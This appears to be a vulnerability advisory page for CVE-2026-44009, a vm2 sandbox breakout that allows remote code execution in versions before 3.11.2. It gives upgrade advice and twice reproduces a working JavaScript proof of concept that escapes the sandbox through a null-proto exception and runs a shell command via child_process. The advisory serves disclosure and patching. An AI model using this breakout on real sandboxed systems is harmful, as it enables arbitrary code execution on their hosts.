Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.8
CVE-2026-44009: vm2 Sandbox Breakout Allows Remote Code Execution
GHSA-9vg3-4rfj-wgcm
CVE-2026-44009
Summary
A vulnerability in vm2 allows attackers to break out of a sandbox and execute arbitrary commands on the host system. This could allow attackers to run malicious code and access sensitive data. To protect your systems, ensure you're running the latest version of vm2.
What to do
- Update GitHub Actions vm2 to version 3.11.2.
- Update vm2 to version 3.11.2.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | GitHub Actions | vm2 |
< 3.11.2 Fix: upgrade to 3.11.2
|
| npm | – | vm2 |
< 3.11.2 Fix: upgrade to 3.11.2
|
Original title
vm2 has Sandbox Breakout Through Null Proto Exception
Original description
### Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
In `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
throw o;
} catch (e) {
e.f = Buffer.prototype.inspect
o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));
```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
### Details
In `handleException` due to ``// SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`)`` exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host `Function` object.
### PoC
```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
throw o;
} catch (e) {
e.f = Buffer.prototype.inspect
o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));
```
### Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
ghsa CVSS3.1
9.8
Vulnerability type
CWE-668
Published: 8 May 2026 · Updated: 23 May 2026 · First seen: 8 May 2026